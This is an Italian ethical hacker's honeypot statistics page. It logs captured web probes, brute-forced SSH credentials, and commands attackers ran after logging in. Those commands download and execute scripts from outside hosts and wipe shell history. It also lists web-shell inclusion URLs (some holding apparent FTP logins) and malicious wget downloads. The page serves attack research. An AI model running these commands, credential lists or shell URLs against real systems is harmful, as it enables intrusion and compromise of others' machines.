ENG ITA

# Ethical Hacker & ICT Security Specialist

Honeypot

In informatica, una honeypot (letteralmente: "barattolo di miele") è un sistema o componente hardware/software usato come esca al fine di studiare ed analizzare gli attacchi informatici in tempo reale.

Solitamente consiste in uno o più siti o servizi che sembrano essere parte della rete e che contengono informazioni preziose per un attaccante, ma che in realtà sono ben isolati e non contegono dati reali, ma forniscono a chi li amministra tutti i dettagli degli attacchi informatici subiti.

Il valore primario di una honeypot è quindi l'informazione che essa dà sulla natura e la frequenza di eventuali attacchi subiti.

Se sei curioso di scoprire questo mondo, guarda le statistiche degli attacchi in tempo reale che ora dopo ora vengono rilevati dalla mia rete di honeypot:

Dizionari live

E' possibile scaricare dizionari di password, nomi utente e coppie user/pass estrapolati dagli attacchi verso il servizio SSH:

Tutte le statistiche della honeypot di seguito:

WEB

×
LAST 20 (relevant) EVENTS
Timestamp Source
2016-04-22 00:18:56 178.137.93.24 Ukraine
/xmlrpc.php
2016-04-22 00:18:08 66.249.66.73 United States
/wp-content/themes/eStore/library/thumb/wp-content/themes/eStore/path.php?ev
2016-04-22 00:15:41 178.137.93.24 Ukraine
/xmlrpc.php
2016-04-22 00:12:26 178.137.93.24 Ukraine
/xmlrpc.php
2016-04-22 00:11:31 66.249.66.79 United States
/wp-content/themes/eStore/library/thumb/wp-content/themes/eStore/path.php?ev
2016-04-22 00:09:44 178.137.93.24 Ukraine
/xmlrpc.php
2016-04-22 00:06:29 178.137.93.24 Ukraine
/xmlrpc.php
2016-04-22 00:05:11 66.249.66.73 United States
/wp-content/themes/eStore/library/thumb/wp-content/themes/eStore/path.php?ev
2016-04-22 00:02:12 178.137.93.24 Ukraine
/xmlrpc.php
2016-04-22 00:02:11 66.249.66.39 United States
/themes/delegate/wp-content/themes/delegate/library/thumb/thumb.php?src
2016-04-22 00:00:50 207.46.13.193 United States
/
2016-04-21 23:58:41 66.249.66.39 United States
/themes/delegate/wp-content/themes/delegate/library/thumb/thumb.php?src
2016-04-21 23:57:44 178.137.93.24 Ukraine
/xmlrpc.php
2016-04-21 23:55:36 66.249.66.45 United States
/themes/delegate/wp-content/themes/delegate/library/thumb/thumb.php?src
2016-04-21 23:53:31 178.137.93.24 Ukraine
/xmlrpc.php
2016-04-21 23:53:27 216.244.79.218 United States
/cgi-bin/principal.php?filepath
2016-04-21 23:52:37 66.249.66.45 United States
/themes/delegate/wp-content/themes/delegate/library/thumb/thumb.php?src
2016-04-21 23:49:37 66.249.66.76 United States
/.br/file.php?showpage
2016-04-21 23:49:29 178.137.93.24 Ukraine
/xmlrpc.php
2016-04-21 23:46:54 66.249.66.45 United States
/themes/delegate/wp-content/themes/delegate/library/thumb/thumb.php?src
×
TOP 15 (attacker) IP
Connections Type Source
7045 sqli 113.106.106.131 China
4153 sqli 73.25.169.97 United States
3588 sqli 49.213.24.15 Singapore
3068 sqli 209.34.228.52 United States
3033 sqli 94.242.57.172 Russian Federation
2949 sqli 93.115.97.22 Romania
2946 sqli 125.161.33.242 Indonesia
1934 sqli 80.242.123.135 Bosnia and Herzegovina
1343 sqli 36.85.72.196 Indonesia
1088 sqli 107.167.178.81 United States
956 sqli 36.84.234.220 Indonesia
766 sqli 139.195.60.157 Indonesia
733 sqli 114.125.186.11 Indonesia
733 sqli 89.28.96.139 Moldova, Republic of
732 sqli 202.67.45.47 Indonesia
×
TOP 15 EXT
Count ext
6 log
5 txt
4 asp
4 ini
3 vmx
3 reg
3 nsf
2 vmdk
2 ldif
2 conf
2 dat
2 inc
2 gho
1 ccm
1 pqi
×
TOP 15 INTITLE
Count ext
41 index.of
27 Index Of
23 login
17 \\"Index
9 Index
8 admin
8 Novell
8 Welcome
6 ilohamail
5 intranet
5 DocuShare
5 PHP
4 Microsoft
4 EXTRANET
4 Remote
×
TOP 15 INTEXT
Count ext
8 parent directory
5 Subject
4 Warning:
3 gmail
3 appSettings
3 env.ini
3 Index of /
2 password
2 EZGuestbook
2 Fill
2 phpMyAdmin MySQL-Dump
2 nrg-
2 HTTP_FROM=googlebot
2 userid
2 Thank you for your order
×
TOP 15 INURL
Count ext
118126 /phpmanager/HTTP/newsticker_info.php
27450 /themes/vilisya/comments&%3Bsa%3DU&%3Bei%3DdekoU_CuGozr0QGQ4IDABw&%3Bved%3D0CCcQFjAC&%3Busg%3DAFQjCNFCTlDfdlRf3FTquEy1RYNOnmOJUA/main.php&%3Bsa%3DU&%3Bei%3D5Y67VOHfGMqWNpvbgPAD&%3Bved%3D0CGIQFjAP&%3Bu
18576 /includes/comments
10105 /admin/phpmyadmin/comments
8875 /checkout_confirmed.asp
7491 /cpcommerce/comments
7407 /cgi-bin/comments
7111 /robots.txt
7045 /cgi-bin/promo.asp
6619 /comments
5512 /wp-content/themes/striking/includes/comments
5220 /admin/HTTP/comments
4821 /ConnectComputer/order.asp
4544 /themes/vilisya/comments&%3Bsa%3DU&%3Bei%3DdekoU_CuGozr0QGQ4IDABw&%3Bved%3D0CCcQFjAC&%3Busg%3DAFQjCNFCTlDfdlRf3FTquEy1RYNOnmOJUA/wp-content/themes/vilisya/timthumb.php
4254 /phpMyAdmin-2.6.1-pl2/scripts/viewshowdetail.php

SSH

×
Last 50 commands executed
DateCommandSource
2016-11-21 18:14:36cd /tmp125.17.68.42 India
2016-11-21 18:14:36wget http://198.167.140.29/gtop.sh125.17.68.42 India
2016-11-21 18:14:36curl -O http://198.167.140.29/gtop.sh125.17.68.42 India
2016-11-21 18:14:36chmod 777 gtop.sh125.17.68.42 India
2016-11-21 18:14:36sh gtop.sh125.17.68.42 India
2016-11-21 18:14:36tftp 198.167.140.29 -c get tftp1.sh125.17.68.42 India
2016-11-21 18:14:36chmod 777 tftp1.sh125.17.68.42 India
2016-11-21 18:14:36sh tftp1.sh125.17.68.42 India
2016-11-21 18:14:36tftp -r tftp2.sh -g 198.167.140.29125.17.68.42 India
2016-11-21 18:14:36chmod 777 tftp2.sh125.17.68.42 India
2016-11-21 18:14:36sh tftp2.sh125.17.68.42 India
2016-11-21 18:14:36rm -rf gtop.sh tftp1.sh tftp2.sh125.17.68.42 India
2016-11-21 18:14:36cd 125.17.68.42 India
2016-11-21 18:14:36rm -rf ./bash_history125.17.68.42 India
2016-11-21 18:14:36history -c125.17.68.42 India
2016-11-21 18:00:58cd /tmp125.17.68.42 India
2016-11-21 18:00:58wget http://198.167.140.29/gtop.sh125.17.68.42 India
2016-11-21 18:00:58curl -O http://198.167.140.29/gtop.sh125.17.68.42 India
2016-11-21 18:00:58chmod 777 gtop.sh125.17.68.42 India
2016-11-21 18:00:58sh gtop.sh125.17.68.42 India
2016-11-21 18:00:58tftp 198.167.140.29 -c get tftp1.sh125.17.68.42 India
2016-11-21 18:00:58chmod 777 tftp1.sh125.17.68.42 India
2016-11-21 18:00:58sh tftp1.sh125.17.68.42 India
2016-11-21 18:00:58tftp -r tftp2.sh -g 198.167.140.29125.17.68.42 India
2016-11-21 18:00:58chmod 777 tftp2.sh125.17.68.42 India
2016-11-21 18:00:58sh tftp2.sh125.17.68.42 India
2016-11-21 18:00:58rm -rf gtop.sh tftp1.sh tftp2.sh125.17.68.42 India
2016-11-21 18:00:58cd 125.17.68.42 India
2016-11-21 18:00:58rm -rf ./bash_history125.17.68.42 India
2016-11-21 18:00:58history -c125.17.68.42 India
2016-11-21 17:54:58cd /tmp125.17.68.42 India
2016-11-21 17:54:58wget http://198.167.140.29/gtop.sh125.17.68.42 India
2016-11-21 17:54:58curl -O http://198.167.140.29/gtop.sh125.17.68.42 India
2016-11-21 17:54:58chmod 777 gtop.sh125.17.68.42 India
2016-11-21 17:54:58sh gtop.sh125.17.68.42 India
2016-11-21 17:54:58tftp 198.167.140.29 -c get tftp1.sh125.17.68.42 India
2016-11-21 17:54:58chmod 777 tftp1.sh125.17.68.42 India
2016-11-21 17:54:58sh tftp1.sh125.17.68.42 India
2016-11-21 17:54:58tftp -r tftp2.sh -g 198.167.140.29125.17.68.42 India
2016-11-21 17:54:58chmod 777 tftp2.sh125.17.68.42 India
2016-11-21 17:54:58sh tftp2.sh125.17.68.42 India
2016-11-21 17:54:58rm -rf gtop.sh tftp1.sh tftp2.sh125.17.68.42 India
2016-11-21 17:54:58cd 125.17.68.42 India
2016-11-21 17:54:58rm -rf ./bash_history125.17.68.42 India
2016-11-21 17:54:58history -c125.17.68.42 India
2016-11-21 15:57:39ls -la /var/run/gcc.pid221.229.172.44 China
2016-11-21 15:57:38wget http://221.229.172.44:81/h8r9 chmod +x h8r9 ./h8r9221.229.172.44 China
2016-11-21 02:20:01cd /tmp125.17.68.42 India
2016-11-21 02:20:01wget http://198.167.140.29/gtop.sh125.17.68.42 India
2016-11-21 02:20:01curl -O http://198.167.140.29/gtop.sh125.17.68.42 India
×
Last 20 sessions
DateSource
2016-11-23 21:25:27194.63.141.141 Russian Federation
2016-11-23 21:24:3182.53.144.214 Italy
2016-11-23 21:23:345.196.76.41 France
2016-11-23 21:23:2782.53.144.214 Italy
2016-11-23 21:13:4382.53.144.214 Italy
2016-11-23 21:10:1882.53.144.214 Italy
2016-11-23 21:07:5382.53.144.214 Italy
2016-11-23 21:06:3882.53.144.214 Italy
2016-11-23 21:05:31123.31.35.40 Vietnam
2016-11-23 21:05:27123.31.35.40 Vietnam
2016-11-23 21:05:23123.31.35.40 Vietnam
2016-11-23 21:05:19123.31.35.40 Vietnam
2016-11-23 21:05:19123.31.35.40 Vietnam
2016-11-23 21:04:5282.53.144.214 Italy
2016-11-23 21:03:38125.17.68.42 India
2016-11-23 21:01:49125.17.68.42 India
2016-11-23 20:58:59193.201.227.116 Ukraine
2016-11-23 20:57:56125.17.68.42 India
2016-11-23 20:51:30125.17.68.42 India
2016-11-23 20:51:05192.162.101.217 Russian Federation
×
TOP 15 USER+PASS
CountUsernamePassword
19002 adminadmin
11836 rootadmin
2812 rootroot
2283 root123456
2263 rootPassword
1613 root!@
1505 ubntubnt
1374 rootwubao
1324 rootjiamima
744 root12345
693 rootdefault
613 rootp@ssw0rd
591 supportsupport
584 root1234
519 rootabc123
×
TOP 20 SUCCESSFUL LOGIN IPs
CountSource
2156195.88.209.38 Russian Federation
12395.39.222.159 Netherlands
1126195.88.208.44 Russian Federation
651140.130.203.58 Taiwan
495220.82.31.244 Korea, Republic of
258103.26.99.18 India
234195.154.183.162 France
230151.49.82.61 Italy
223183.3.202.187 China
220117.6.135.30 Vietnam
213185.63.255.91 Netherlands
182138.36.228.57 Brazil
17978.46.105.145 Germany
17878.46.112.3 Germany
17778.46.73.71 Germany
17678.46.114.99 Germany
171183.3.202.110 China
168116.31.116.26 China
16778.46.78.14 Germany
16778.46.109.180 Germany
×
TOP 20 attackers
ConnectionsSource
2758343.255.189.80 Hong Kong
1916943.255.189.31 Hong Kong
1115943.229.52.62 Hong Kong
9847221.229.172.103 China
8372103.41.124.16 Hong Kong
8118103.41.124.35 Hong Kong
799943.229.52.32 Hong Kong
7815103.41.124.20 Hong Kong
7771103.41.124.52 Hong Kong
7432103.41.124.41 Hong Kong
7016103.41.124.25 Hong Kong
6910116.31.116.26 China
6735103.41.124.13 Hong Kong
6720103.41.124.32 Hong Kong
6656103.41.124.53 Hong Kong
6649103.41.124.33 Hong Kong
6560103.41.124.56 Hong Kong
6460103.41.124.111 Hong Kong
6210103.41.124.28 Hong Kong
6179103.41.124.55 Hong Kong

MALWARE

×
Malicious Files (ALL)
FileAttacker
00ad1fa280b4948a9ec64525d92a4f1c 191.242.196.157 Brazil
http://reativacao.w00.us/wpcont.txt?
01244fd57550f70c431dd63369f3cfa4 119.15.167.80 Vietnam
http://img.youtube.com.techshield.us/jembay.php
022064078fe3b5dcc4f1f153751110a0 103.230.104.13 Bangladesh
http://www.google.com
04406140e74f6f7484c18053a08c22d5 212.93.222.10 Saudi Arabia
http://picasa.com.ebusinessbpo.in/magic.php
04ac7436cf7d683c24d45e0835b5140a 71.51.218.173 United States
http://www.r57shell.net/shell/r57.txt?
0b69fbd2623786f4f7f6199de1db37c9 118.71.63.120 Vietnam
http://google.com
0fa5287a4069d1ae3b79f41579ab253b 24.116.154.237 United States
http://smartfufchair.com/darkk.php
1168d3a850704de31d7591b3b3f130c3 103.230.106.18 Bangladesh
http://www.google.com
117ce05ddb8db352ca4a4575e33d1b5a 46.105.100.54 France
http://wordpress.com.revistavance.com/magic.php
148fb406ad9ec7a25d0241bad3a15cf2 103.230.104.13 Bangladesh
http://www.google.com
16ee11669c874ce69d2347c019488a7a 212.48.81.42 United Kingdom
http://img.youtube.com.labhouse.com.br/files.php
1a51202502125d955d1168b5b41a518b 2.84.154.33 Greece
http://83.212.115.224:8080/tt.php
1a614f51d0f1396379dbd54c14024c2f 68.169.37.140 United States
http://img.youtube.com.cjscotland.org.uk/.mods/sh.php
1b873a0cd76994663f8b4535b3f1effc 37.59.44.45 France
http/themes/vilisya/comments&%2525253Bsa%2525253DU&%2525253Bei%2525253DdekoU_CuGozr0QGQ4IDABw&%2525253Bved%2525253D0CCcQFjAC&%2525253Busg%2525253DAFQjCNFCTlDfdlRf3FTquEy1RYNOnmOJUA/main.php&%25253Bsa%25253DU&%25253Bei%25253DL_CZVJigOYf5ywPN7YLoCw&%25253Bved%25253D0CC4QFjAF&%25253Busg%25253DAFQjCNG_prZwamDyJFGFB6T4mnsZAKHoTQ/wp-content/themes/vilisya/wp-content/themes/LondonLive/functions/thumb/timthumb.php%3Fsrc&amp%3Bsa%3DU&amp%3Bved%3D0CMYBEBYwJWoVChMI1O3PvuupxwIV5apyCh0-BgC-&amp%3Busg%3DAFQjCNEGo
1c488c4b9df37e98739e8bc626952687 196.203.83.3 Tunisia
http://picasa.com.climashop.ro/pagat.php
1d1722a3120176140b4e9f3ee1315d2b 80.93.221.228 Turkey
http://wordpress.com.longlifeweld.com.my/cpx.php
1e5161f6e1cc666c08fbdc9d8446967c 191.242.198.33 Brazil
http://reativacao.w00.us/sucks.txt?
1f9a008012903984b369be1571994bb8 187.113.150.101 Brazil
http://google.com
1fcd7ad282a700c288955cd13c5c6fce 103.230.104.13 Bangladesh
http://www.google.com
2193538b128d5dccac7c3f198552e8d5 216.218.131.131 United States
http/sqlitemanager-1.2.4/channel_id%3Dftp://volleycl:volleyclubmaconnais@ftp.volleyclubmaconnais.fr/wvw/good.php
23296960fe151a1ed3cf80cee0e93720 191.242.198.165 Brazil
http://reativacao.w00.us/sucks.txt?
24e8806864dc4e39333e9d75789d35c5 187.113.150.101 Brazil
http://google.com
2744598fb98cacc6d77f7102062b6ef5 104.197.70.90 United States
http://picasa.com.blitar-coder.com/up.php
2c650523343ef0d5f962f086097e878a 85.87.197.139 Spain
http://www.google.es
2dba9b4e17ea0e0ff756366a2ae387cb 188.97.150.204 Germany
http://www.r57shell.net/shell/c99.txt
2ddf861477848f8da501e3742b9e2fc2 66.249.64.106 United States
http://netsunucum.com/status/-/inboxter.txt
2ed96798f60d9b7db49d730978cfc3e1 62.210.107.201 France
http/sqlitemanager-1.2.4/channel_id%3Dftp://volleycl:volleyclubmaconnais@ftp.volleyclubmaconnais.fr/wvw/good.php
3110aad10bbf81757ac2f00cd9f3d35b 112.175.184.2 Korea, Republic of
http://picasa.com.vinogradialeksic.com/config.php
3250e3eafbeee71e1a2a8f0f528ebdc4 212.76.140.171 Russian Federation
http://ghosteam.no-ip.org/public/saus.jpg??
32bd5ef7c6ed89023576af6ba7f6720c 196.203.83.3 Tunisia
http://flickr.com.tropicaltur.ro/blackunix.php
369aab6f3a40d0259e6b036b68c27d25 89.130.171.6 Spain
http://blogger.com.filmstruck.com/lin.php
39f186a0f55b04c651cbff6756a64ccc 37.187.147.6 France
http://picasa.com.eulerpumps.com/pagat.php
3accf006ec6ca42675d9ff6d4c35df01 85.128.142.59 Poland
http://marginalvaluepartners.com/magic.php
429dade339dc2634c8bbaa1e54e3f4a2 191.242.196.157 Brazil
http://www.dms.ubu.ac.th/finance/salary/wpcont.txt?
4571dc396d199c82c82aff3187109d41 175.45.195.214 Korea, Republic of
http://www.c99shellphp.com/shell/c99.txt?
45c843383eb48c5bd6393d64f5a7351b 91.121.85.53 France
http://flickr.com.sapkaatolyesi.com/rox.php
474c4daeff3d82ae49d7c96acb8c0d84 23.254.132.10 United States
http://flickr.com.hotelkouris.gr/xp.php
4af6f17a6ddb2d50cf00ca312fefb9dc 187.113.150.101 Brazil
http://google.com
4eee1046939e8323c2e5bc84ad35ee2c 202.6.19.50 Thailand
http://picasa.com.busint.com.co/simple.php
4f2687449dc958f45e46019be584c777 123.108.246.26 Bangladesh
http://www.google.com
5244e8bd5803902d206645678887f37d 2.84.154.33 Greece
http://83.212.115.224:8080/evilscript2.txt
54302ef84d096763647839b3ff86d6c0 80.93.221.228 Turkey
http://wordpress.com.longlifeweld.com.my/magic.php
563da5c4590e0ea7a0a37a04c5dd046f 176.31.239.81 France
http://picasa.com.zoranbognar.com/up.php
5713bb245f0c402b2587efc0f516506b 149.210.164.194 Netherlands
http://www.la-baume-dhostun.fr/plugins/user/profile/profiles/j2.jpg??
573c1aef67f08f31c191913e70e8a2d0 24.116.154.237 United States
http://www.joomlaworks.net/images/demos/galleries/abstract/7.jpg
58fc4ad40608628a69c0d0f9f3b3d3f4 188.165.242.77 France
http://picasa.com.toplink.ro//cpx.php
5b0593a34a702b71aac0c9a94108524c 192.163.248.205 United States
http://wordpress.com.gestionautoecole.com/magic.php
5c559e991c88ff43adfd9c7f51bc4f12 103.230.104.13 Bangladesh
http://www.google.com
6255407b46ef88ca3a1fda7aaeb45909 187.113.150.101 Brazil
http://google.com
66765f9f733db4710edb0dcde6084a5b 106.2.192.202 China
http://187.33.0.228/voxmobile/scripts/tmp/config.php
667c856d46a729e80c84121fa8d111a6 103.230.104.13 Bangladesh
http://www.google.com
66ef8b2099f43fe4108d16f7b4916432 179.219.62.37 Brazil
http://sicumdogsignatures.com/lightbox/css/TESTADOR.txt?
67ff0401a718e309eee7628ab3ecd5d6 189.82.58.156 Brazil
http://erios.com.br/jow.php
6d463f0f2c931976d4aab2cda570cd23 196.46.125.2 Zambia
http://img.youtube.com.agmcmortgage.com/bad.php
6eb9de276e2dc8a8c5bc34c2ae6b30da 5.22.65.124 Iran, Islamic Republic of
http://www.sh3ll.org/r57.txt?
6f204bf9c97ddfee0002a5763b53a148 191.242.196.157 Brazil
http://reativacao.w00.us/wpcont.txt?
7581d217e8b7d0abb2ef13ca9ff5f396 177.245.175.134 Mexico
http://www.negocl.com/100.txt?
779295208affb542763855e9deffb138 213.152.162.74 Netherlands
http://google.com
77ec08d8303b67ad245b1676f70a0ae4 151.80.88.241 France
http://picasa.com.etimeinternetsolutions.com/petx.php
79c71e23a5179dd89db430fd03416a71 85.214.112.232 Germany
http://blogger.com.keramin.com/blackunix.php
7d46eb335eab047ef02ba6adc0c84e26 24.116.154.237 United States
http://pastebin.com/raw.php?i=B0GkTr1Z
8157fd19b45480ad2baf597c4e498313 198.50.151.199 Canada
http://q8da.com/wordpress.com/indeks.php
81c46c41c8ea0435261fc52fd3156b5e 37.187.137.27 France
http://wordpress.com.longlifeweld.com.my/cpx.php
82349d0e0b605f52236cbaaeba4d2667 179.181.39.236 Brazil
http/sqlitemanager-1.2.4/channel_id%3Dftp://volleycl:volleyclubmaconnais@ftp.volleyclubmaconnais.fr/wvw/good.php
84f72b7958cc4ffd24c908b0ca251e0e 179.181.39.236 Brazil
http/newsticker_info.php?idn=ftp://volleycl:volleyclubmaconnais@ftp.volleyclubmaconnais.fr/wvw/teste.php?
8572ec05164477e32b3813f9efb8aef8 186.3.9.7 Ecuador
http://r0x.altervista.org/byroe.jpg??
860724b8c830d6079a869361323228bc 49.50.76.8 India
http://flickr.com.sapkaatolyesi.com/bad.php
86d66c49f32323bdeaf925337e6e03b9 62.210.74.137 France
http://facebook.website.pl/x/aa.txt
86f3e711cbcc6bad106384f5f4f0af21 87.118.126.156 Germany
http://flickr.com.createvents.gr/reader.php
8c8858e7e1eb9b79fb4c18123407b957 192.111.146.156 United States
http://yahnamissed.xoom.it/start.txt?
8d20b113376ec3dd943f0d1b2b28f07b 103.10.197.211 Hong Kong
http://osmose.6spot.com.br/modules/mod_mainmenu.php?mosConfig_absolute_path=../etc/passwd
8e04a52df7fa1ceba2926fa37eb3ff62 176.31.239.81 France
http://wordpress.com.longlifeweld.com.my/imagess.php
8f46bd53add1cef765cf4c563248bec6 91.121.25.14 France
http://mtf.altervista.org//xmlrfi.jpg??
8f8adad762a39ba298b9ee8b7555acf3 178.33.51.153 Poland
http://img.youtube.com.bargainbookfinders.com/sempak.php
91aea7e046e095e8f17791189436f860 201.2.95.69 Brazil
http://www.fisheries.go.th/if-phrae/web2/images/4.txt
93751316bc675046a8df44dfe3c4a844 27.67.42.224 Vietnam
http://www.google.es
9385a0dc9eb1f43803164a91f5bfb123 217.113.158.226 Poland
http://travelturismocochiguaz.cl.legacymemorybank.com/unel.php
938f649e5f4cf3f6609acf9ef56ae835 192.99.148.23 Canada
http://identerprise.co.kr/css/byroe.jpg??
9480953e13ebbf92f026797f9365049c 192.99.148.23 Canada
http://identerprise.co.kr/css/kht.jpg??
94b5e63ac9ec30226e03338dd4fe11d5 85.87.197.139 Spain
http://www.google.es
9536894f1783c6518d6b74248db289f4 188.165.220.123 France
http://wordpress.com.longlifeweld.com.my/magic.php
95ea90c546f7c576bf029d7e0d64298d 212.13.64.42 Macedonia
http://engarrafe.com.br/dd.txt??
986008b5bee8e435965761a9144bded6 41.66.208.211 Ghana
http://google.com
9bfa46968e2140bbfef3c44203712104 151.80.116.209 France
http://txcdl.com/wp-admin/includes/xp.php
9c298b10a7e3e0f78e78c5d588d28396 85.128.142.59 Poland
http://marginalvaluepartners.com/magic.php
9d05dd4be3c8457ccdb2a95cd2d16957 46.246.31.40 Sweden
http://www.dcvi.net/r57.txt
9e866b8855c08a93f23afce1b9a79756 202.62.155.43 Australia
http://picasa.com.dorduncukuvvetmedya.com/uplod.php
9ece8d9267c4ed7cfb41797efae9af87 66.64.61.2 United States
http://flickr.com.phytotechsuriname.com/bad.php
a783d6dc5fcc26c4147c81de933d264a 204.12.124.138 United States
http://datagatebilisim.com/downloads/inboxter.txt
aa739e53fe6423faa6d5e25477b35e8a 189.82.58.156 Brazil
http://erios.com.br/jow.txt
ad4c54d7c61f2d68be47c201ed3ff019 2.84.154.33 Greece
http://83.212.115.224:8080/uname.php
ade8840bb926c9f354c24764c0cca33c 78.24.51.82 Moldova, Republic of
http://nutrition.mutatednation.com/magic.php
b0585649a06c98463d028b63c6c4971c 24.116.154.237 United States
http://pastebin.com/raw.php?i=B0GkTr1Z
b314f552139a746bbb39332bc8aa4bec 188.165.206.51 France
http://wordpress.com.gestionautoecole.com/magic.php
b4c837efd8ca6793988472c3a30d8d1d 2.84.154.33 Greece
http://83.212.115.224:8080/id.txt
b6cd569f80f72abfcbf395d533637b02 85.106.157.89 Turkey
http://gr3enox.net23.net/Checker.php%00
b7155bcf017b894b09c79378e8e95ab5 85.17.149.15 Netherlands
http://picasa.com.fershau.com/indeks.php
b7c546173f446e17da3b5ad9265aabb3 151.80.88.241 France
http://picasa.com.etimeinternetsolutions.com/cpx.php
b95a15881877fd9b3fa82c3c14ed951d 188.165.242.77 France
http://picasa.com.toplink.ro//magic.php
ba2756ce2f1e01f3a753d7a0b28e8ca5 93.158.152.45 Russian Federation
http://netsunucum.com/status/-/inboxter.txt
bc20a67a1fb42e8d2d47a23db523dc31 94.23.55.79 France
http://www.la-baume-dhostun.fr/plugins/user/profile/profiles/shit/j2.jpg??
bc2b9c6f80a9557cbb88280666784704 187.113.150.101 Brazil
http://google.com
bd00d50a8601d723684bb7c583cb11f6 168.144.82.36 Canada
http://picasa.com.vazraasuka.com/end.php
be92caeb7a0cb6f0be195bd4f6544176 104.245.101.225 United States
http/sqlitemanager-1.2.4/channel_id%3Dftp://volleycl:volleyclubmaconnais@ftp.volleyclubmaconnais.fr/wvw/good.php
c02ec4ffcb77ec19fc440dfe99c604e9 93.115.84.195 Anonymous Proxy
http://img.wikinut.com/img/gycf69_-6rv_5fol/jpeg/0/Best-Friends-Img-Src:Image:-FreeDigitalPhotos.net.jpeg
c28315dbbad09bd8f3082871f4c00e5e 177.125.20.3 Brazil
http://rts-group.org/rittal/r57.txt
c3e1dea23072a2a21e9479bb10888282 93.115.248.150 Romania
http://picasa.com.flatabovefoodsbury.com/bad.php
c65b0c66d495312d4a1deccc170fff26 2.84.154.33 Greece
http://83.212.115.224:8080/uname.php
cb20b5a6fdc7c5ccfef203a89a9c2458 37.59.44.45 France
http://wordpress.com.longlifeweld.com.my/id.txt??
cbb153bef8a388691d97b8c209d93924 87.238.162.122 Belgium
http://blogger.com.janiquebyk.com/cilik.php
cd371d3afaef6ec2253cb8a88b5f7d54 66.249.78.46 United States
http/sqlitemanager-1.2.4/channel_id%3Dftp://volleycl:volleyclubmaconnais@ftp.volleyclubmaconnais.fr/wvw/good.php
ce3ee3c4b11ea6fb31f1853d5b99269c 62.138.0.14 Germany
http/newsticker_info.php?idn=ftp://raniempire:raniempire@www.raniempire.com/raniempire.com/data/sony.php?
d10738bbe853a4cb34af714f3649da14 85.87.197.139 Spain
http://www.google.es
d326b13a998846015cdb94051ab902f7 146.0.40.55 Germany
http://wordpress.com.longlifeweld.com.my/sad.txt??
d6182a28ac9f049416e7278c2e27e10e 191.242.197.252 Brazil
http://dunkelzeit.bplaced.net/Dunkelzeit2.0/suck.txt?
d72eda6722d716424575a3473337c6ed 151.80.116.209 France
http://txcdl.com/wp-admin/includes/xp.php
d990f1cfa348f4db748eecc4bc9b469a 151.95.224.107 Italy
http://flickr.com.pupitre.cl/bad.php
d9d388fbba2781d974d23e72ee2f02a9 122.155.3.165 Thailand
http://blogger.com.umasunil.com/countxx.php
dbd75d63d4b32f672a77f6055c7bb708 198.55.96.63 United States
http/sqlitemanager-1.2.4/channel_id%3Dftp://volleycl:volleyclubmaconnais@ftp.volleyclubmaconnais.fr/wvw/good.php
dd6ce0aed4d3e49597a0a941d125d55f 202.172.28.18 Japan
http://picasa.com.toplink.ro/coreunix.php
e13fa02dd07f03d13447ca709c350773 142.4.12.216 United States
http://img.youtube.com.techshield.us/jembay.php
e14050dc20ba8853c00606ba267f0450 179.188.1.65 Brazil
http://picasa.com.insurama.gr/xp.php
e1d4c790ca5b41302909113731bafb77 149.62.172.62 Spain
http://picasa.com.thongluan.co/hatz.php
e364af315ac41bef3ba93352668c9656 50.61.255.13 United States
http://picasa.com.atelierzdrowiaiurody.eu/bad.php
e4344a69156d8fffb40aae8f5f53dfd0 198.50.151.199 Canada
http://q8da.com/wordpress.com/magic.php
e51c14f7e217c01ccdf27c08bbab7125 162.250.84.167 United States
http://162.250.84.167/crossfire.txt???
e7883a594444f261347f3adcf469d22c 200.98.67.179 Brazil
http/newsticker_info.php?idn=ftp://shopsky:shopsky@shopsky.kr/public_html/sony.php?
ea4c8fc9a16c9b24da64d4304e0c5970 109.230.244.221 Germany
http://picasa.com.topdesmeilleurs.com/jom.php
eb8b0a939f5c9596a3b0300fbe0a3184 192.169.90.88 United States
http://ullvers.nl/media/teste.txt
ecfb1606e8b7c01c417b67282e9c6e35 85.159.215.181 United Kingdom
http://flickr.com.sapkaatolyesi.com/bad.php
ef4e4e9265a071b2c0e9e88ca7c48e7d 187.113.150.101 Brazil
http://google.com
f1597c7a5ea72fdff7c73b05c1d6aeb4 73.196.240.139 United States
http://blogger.com.emilsonrabelo.com/up.php
f2ff99543bbc9f2dc26ec96bfd770289 190.242.118.26 Colombia
http://wordpress.com.longlifeweld.com.my/magic.php
f378ace228bd2e52092e7d4696d8bc83 103.230.104.13 Bangladesh
http://www.google.com
f6acf13b5ac7ee95f7f449a15c2eeafb 123.108.246.26 Bangladesh
http://www.google.com
f951cdf80827752bb75839506971c34f 27.67.42.224 Vietnam
http://www.google.es
fba64a43aa51432465318aeacac35eb3 85.87.197.139 Spain
http://www.google.es
fd12a9d4646388ec5ced723557db01b4 24.116.154.237 United States
http://pastebin.com/raw.php?i=B0GkTr1Z
fff8d31b6c6b75cd6ac6b3224b07e18f 1.234.90.240 Korea, Republic of
http://wordpress.com.branomojsej.sk/mods/sh.php
×
Malicious Remote Files (SSH)
Wget Command
wget http://208.67.1.33/cats.sh
curl -O http://208.67.1.33/cats.sh
wget http://222.187.227.145:6654/xuxs
wget http://222.187.227.145:6654/sdas
wget http://222.187.227.145:6654/asd
wget http://198.167.140.29/gtop.sh
curl -O http://198.167.140.29/gtop.sh
wget http://212.59.112.214/gtop.sh
curl -O http://212.59.112.214/gtop.sh
wget -c http://103.56.115.43/Linux2.6
wget http://catsmeowalot.com/gtop.sh
curl -O http://catsmeowalot.com/gtop.sh
wget http://117.41.229.10:8989/Linux2.4
wget http://117.41.229.10:8989/linux-mips
wget http://117.41.229.10:8989/linux-arm
wget http://117.41.187.181:3322/sscy2.6
wget http://173.254.236.43:8090/Boot
wget http://173.254.236.43:8090/Aoot
wget http://202.28.120.32/gtop.sh
curl -O http://202.28.120.32/gtop.sh
wget -c http://118.193.24.106:7851/breeb
wget -c http://103.214.170.92:7788/breeb
wget http://104.223.17.52:3366/linzi64
wget http://104.223.17.52:3366/linzi32
wget http://94.192.118.63/kk.pl
wget http://103.55.178.55/kk.pl
wget http://118.193.233.83/kk.pl
wget http://118.193.233.83/gtop.sh
curl -O http://118.193.233.83/gtop.sh
wget -c http://t.cn/RcDPOu8
wget -c http://t.cn/RcDPxTU
wget http://58.221.66.146:8096/xiaom
wget http://103.56.113.122:9464/jrfs
wget http://103.56.113.122:9464/Lowr
wget http://103.55.178.55/gtop.sh
curl -O http://103.55.178.55/gtop.sh
wget http://107.161.89.181/h8r9 chmod +x h8r9 ./h8r9
wget -c http://222.186.51.168:7712/taiyo
wget -c http://222.186.51.168:7712/iuny
